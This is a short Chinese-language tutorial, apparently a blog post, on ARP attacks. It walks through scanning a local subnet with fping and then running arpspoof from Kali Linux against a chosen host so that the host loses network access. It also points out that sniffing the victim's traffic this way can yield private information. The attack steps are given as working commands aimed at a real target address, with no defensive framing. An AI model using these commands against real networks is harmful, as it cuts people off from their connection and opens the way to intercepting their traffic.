所谓ARP攻击,就是伪造IP和MAC地址进行的攻击或者欺骗,ARP攻击和ARP欺骗应该是两个概念,ARP攻击所产生的效果就是使目标主机(当然这里默认的是局域网,倘若你处在外网,涉及到内网渗透,以后在具体说内网渗透)断网,这种行为从某种意义上来说是,是损人不利己的,因为攻击者并没有得到什么好处,只是让对方不能上网,但是如果在ARP攻击的基础上,通过嗅探对方的流量,非法获取一些隐私信息,那就大大不同了。
ARP欺骗:传送
0x00环境及工具
环境:Kali linux环境
工具:Dsniff、fping
Dsniff是一个基于unix系统网络嗅探工具集,这里所用的是arpspoof命令。
fping可以说是ping的增强版,可以在ping时间按照从1毫秒到5秒的频率调整时间并且在每次应答成功(超时)的时间发出语音提示,还可以同时ping多台主机,在这里的作用是寻找局域网中的设备ip地址。
0x01寻找目标
使用fping寻找地址:
$ fping -a -g 192.168.199.0/24 2>/dev/null
也可以用:
$ fping -a -g 192.168.199.1 192.168.199.254 2>/dev/null
这里选用192.168.199.180作为目标
0x02攻击
arpspoof语法:
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
攻击:
arpspoof -i wlan0 -t 192.168.199.180 192.168.199.1
这时会发现目标上不了网了,攻击目标也达到了。